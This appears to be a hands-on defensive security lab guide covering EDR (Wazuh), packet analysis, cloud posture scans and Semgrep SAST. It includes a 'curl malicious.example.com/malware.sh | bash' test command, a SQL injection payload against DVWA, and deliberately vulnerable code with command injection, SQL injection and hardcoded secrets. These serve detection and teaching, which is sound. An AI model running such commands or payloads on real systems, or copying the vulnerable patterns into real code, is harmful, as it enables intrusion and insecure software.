Security Tools Lab
Checking access...
Objective
Deploy and use four categories of security tools: EDR (endpoint), network analysis, CSPM (cloud), and SAST (application security).
Lab Setup
Prerequisites
- Linux VM (Ubuntu 22.04+) with Docker
- AWS account (free tier) OR Azure subscription
- Sample web application (DVWA or a local Node.js app)
Exercise 1: Deploy EDR Sensor
# Install Wazuh (open-source EDR/SIEM) via Dockergit clone https://github.com/wazuh/wazuh-docker.gitcd wazuh-docker/single-nodedocker-compose up -d
# Access: https://localhost:443 (admin/SecretPassword)# Deploy agent on a test VM:# Wazuh → Agents → Deploy new agent# Select OS: Linux, Server IP: <your-server-ip>
# Or install agent manually:curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | apt-key add -echo "deb https://packages.wazuh.com/4.x/apt/ stable main" | tee /etc/apt/sources.list.d/wazuh.listapt-get updateapt-get install wazuh-agentsystemctl start wazuh-agent
# Verify agent is connected# Wazuh Dashboard → Agents → (should show active agent)Task: Generate a test alert by running a suspicious command on the agent:
# On the agent VMcurl http://malicious.example.com/malware.sh | bash
# Check Wazuh dashboard for the alertExercise 2: Network Traffic Capture and Analysis
# Start a packet capture on your test VMsudo tcpdump -i eth0 -w lab-capture.pcap -c 10000
# Generate some trafficcurl http://example.comcurl https://google.comping -c 5 8.8.8.8nslookup github.com
# Stop the capture (Ctrl+C)
# Analyse with tcpdumptcpdump -r lab-capture.pcap -nn
# Top talkerstcpdump -r lab-capture.pcap -nn | awk '{print $3}' | cut -d. -f1-4 | sort | uniq -c | sort -nr | head
# DNS queriestcpdump -r lab-capture.pcap port 53 -nn
# Analyse with Zeek (if installed)zeek -r lab-capture.pcap localcat conn.log | zeek-cut ts id.orig_h id.resp_h proto service duration | headcat dns.log | zeek-cut query answer | headTask: Identify the top 5 destination IPs and determine what services they are (use nmap -sV or dig to identify).
Exercise 3: Run a CSPM Scan
# Install ScoutSuitepip install scoutsuite
# Configure AWS credentialsexport AWS_ACCESS_KEY_ID=AKIA...export AWS_SECRET_ACCESS_KEY=...
# Run a scanscout aws --report-dir ./scout-report
# Open the HTML report# Open scout-report/scoutsuite-report.html in browser
# Find at least 3 findings and note the recommended remediationTask: Identify the top 3 security issues in your cloud account and document what AWS config changes are needed to fix them.
Exercise 4: SAST Scan
# Create a deliberately vulnerable test filecat > test-vuln.js << 'EOFF'const express = require('express');const app = express();
// Command Injection Vulnerabilityapp.get('/ping', (req, res) => { const ip = req.query.ip; const result = require('child_process').execSync(`ping -c 1 ${ip}`); res.send(result.toString());});
// SQL Injection Vulnerabilityapp.get('/user', (req, res) => { const id = req.query.id; const query = `SELECT * FROM users WHERE id = ${id}`; db.execute(query, (err, rows) => { res.json(rows); });});
// Hardcoded Secretconst API_KEY = "sk-live-abc123def456ghi789jkl";app.listen(3000);EOFF
# Run Semgrep scanpip install semgrepsemgrep scan --config=auto test-vuln.js
# Expected findings:# 1. Command injection (CWE-78)# 2. SQL injection (CWE-89)# 3. Hardcoded secret (CWE-798)Task: Fix each vulnerability and run semgrep again to confirm the findings are resolved.
Deliverables
- EDR: Screenshot of Wazuh dashboard showing an active agent and at least one security alert
- Network: Screenshot of tcpdump/Zeek output showing DNS queries and top talkers
- CSPM: Screenshot of ScoutSuite report showing at least 3 findings
- SAST: Screenshot of Semgrep output showing 3+ findings, then screenshot after fixes (0 findings)
Bonus Challenge
Set up a complete CI/CD pipeline with security scanning:
- Create a GitHub repository with a sample Node.js app
- Add GitHub Actions workflow with SAST (Semgrep), SCA (Dependabot), and secret scanning (TruffleHog)
- Create a pull request with a deliberate vulnerability
- Show that the pipeline blocks the PR
Tip
The bonus challenge simulates a real DevSecOps pipeline. The key insight: security scanning integrated into CI/CD is vastly more effective than periodic scanning because every change is checked before it reaches production.
Step-by-Step Lab Guide
Lab 1: Deploy EDR Sensor
# Install CrowdStrike Falcon sensor (or use free alternative: Wazuh)# Wazuh is open-source EDR/XDR — suitable for lab use
docker run -d \ --name wazuh-manager \ -p 1514:1514/udp \ -p 1515:1515 \ -p 55000:55000 \ wazuh/wazuh-manager
# On the target machine, install Wazuh agentdocker run -d \ --name wazuh-agent \ -e MANAGER_IP=10.0.0.100 \ wazuh/wazuh-agent
# Verify agent is connectedcurl -u wazuh:wazuh https://localhost:55000/agentsLab 2: Network Traffic Analysis
# Capture traffic between two containersdocker network create security-lab
# Deploy vulnerable web appdocker run -d \ --name dvwa \ --network security-lab \ --network-alias dvwa \ -p 8080:80 \ vulnerables/web-dvwa
# Capture trafficdocker run -d \ --name sniffer \ --network security-lab \ --cap-add NET_ADMIN \ nicolaka/netshoot \ tcpdump -i eth0 -w /data/capture.pcap
# Generate malicious trafficcurl -X POST "http://localhost:8080/vulnerabilities/sqli/" \ -d "id=1' OR '1'='1&Submit=Submit"
# Stop capture and analyse with Wireshark (download pcap)Lab 3: CSPM Scan
# Install Prowler for AWS assessmentpip install prowler
# Configure AWS credentials (use a test/dedicated account)export AWS_ACCESS_KEY_ID=AKIA...export AWS_SECRET_ACCESS_KEY=...
# Run scanprowler aws -M html,json
# View resultsopen prowler/output/html/index.html
# Install ScoutSuite for multi-cloudpip install scoutsuite
# Run ScoutSuitescout awsLab 4: SAST with Semgrep
# Install Semgreppip install semgrep
# Create a sample vulnerable appcat > vulnerable-app.py << 'EOF'import sqlite3from flask import Flask, request
app = Flask(__name__)
@app.route('/user/<int:user_id>')def get_user(user_id): # BAD: SQL injection vulnerability conn = sqlite3.connect('users.db') query = f"SELECT * FROM users WHERE id = {user_id}" result = conn.execute(query).fetchone() return {"username": result[0]}
@app.route('/login')def login(): username = request.args.get('username') password = request.args.get('password') # BAD: Hardcoded credentials if username == "admin" and password == "password123": return {"status": "success"} return {"status": "fail"}EOF
# Run Semgrep scansemgrep scan --config=auto vulnerable-app.pyLab 5: SIEM Integration
# Deploy ELK stack for log analysisdocker run -d \ --name elasticsearch \ -p 9200:9200 \ -e "discovery.type=single-node" \ docker.elastic.co/elasticsearch/elasticsearch:8.11.0
docker run -d \ --name kibana \ -p 5601:5601 \ -e ELASTICSEARCH_HOSTS=http://elasticsearch:9200 \ docker.elastic.co/kibana/kibana:8.11.0
# Ingest Zeek logs into Elasticsearch# Install Filebeat on the machine running Zeekfilebeat setup --index-management -E output.logstash.enabled=false \ -E 'output.elasticsearch.hosts=["localhost:9200"]'
# Create dashboard in Kibana for Zeek conn.log, dns.log, http.logDeliverables Checklist
- Lab environment deployed (Docker with security-lab network)
- EDR/Wazuh agent installed and reporting
- Network capture of SQL injection attempt
- CSPM scan (Prowler or ScoutSuite) results
- SAST scan results showing vulnerability findings
- Bonus challenge: CI/CD pipeline blocking vulnerable code
- SIEM dashboard with ingested logs